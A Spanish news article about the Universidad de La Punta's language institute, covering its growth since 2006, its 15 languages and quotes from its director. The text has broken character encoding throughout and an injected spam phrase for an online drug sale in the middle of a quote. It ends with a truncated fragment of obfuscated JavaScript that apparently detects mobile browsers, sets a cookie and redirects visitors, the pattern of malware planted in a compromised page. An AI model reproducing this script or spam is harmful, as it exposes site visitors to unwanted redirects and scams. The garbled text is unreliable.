Instituto de Idiomas: la propuesta de la ULP que abre las puertas al mundo

MA?s de 2000 puntanos aprendieron una segunda lengua en sus aulas en estos 11 aAi??os. Con 15 idiomas, cinco sedes, propuestas que se adaptan a las necesidades de niAi??os, jA?venes y adultos, y convenios nacionales e internacionales, el Instituto de Idiomas se posiciona como uno de los centros educativos mA?s importantes de la regiA?n de Cuyo.

Aprender idiomas pasA? a ser un requisito excluyente para quienes deseen tener Ai??xito en el plano educativo, laboral y profesional. En estos 11 aAi??os, muchos puntanos eligieron formarse en el Instituto de Idiomas de la Universidad de La Punta (ULP): una iniciativa de ExtensiA?n queAi??abre oportunidades de progreso y superaciA?n a cientos de niAi??os, jA?venes y adultos.

ai???Todo comenzA? el 6 de septiembre del 2006 con el dictado de un solo idioma, ruso, y apenas 12 alumnosai???, recuerda Silvia Maraczuk, directora del Instituto, quien tras haber buy doxazosin 4 mg online sido convocada como traductora en el Mundial de Ajedrez 2005, fue la elegida del entonces rector Luis LusquiAi??os para iniciar con este proyecto educativo.

Con los aAi??os se sumaron mA?s lenguas (hoy ascienden a 15) y nuevas sedes; se nutriA? la oferta educativa con propuestas que se adaptan a las necesidades de los habitantes de San Luis (cursos para niAi??os, para viajeros, de conversaciA?n, preparaciA?n para exA?menes internacionales y otros), y se firmaron convenios con importantes universidades y centros de estudios de todo el mundo, queAi??posicionaron al Instituto de Idiomas de la ULP como uno de los mA?s importantes de la regiA?n de Cuyo.

ai???Llegamos a mA?s de 2000 estudiantes y egresados. Algunos estA?n trabajando en empresas de San Luis, la Argentina y, tambiAi??n, en el exterior. Incluso, muchos de ellos estA?n dictando clases de idiomas. Por ejemplo, en Mendoza, una exalumna hoy se desempeAi??a como profesora de chinoai???, destacA? Maraczuk.

Con una oferta educativa consolidada que se renueva aAi??o a aAi??o, el Instituto de Idiomas de la ULPAi??aspira a seguir llegando a cada vez mA?s puntanos. ai???Estamos muy contentos por la excelente respuesta que tienen nuestros cursos. Esto se debe al perfeccionamiento continuo de nuestros docentes y, tambiAi??n, al enfoque de nuestras propuestas, que buscan integrar lo cultural y lo lingA?Ai??sticoai???, finalizA? Maraczuk. v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}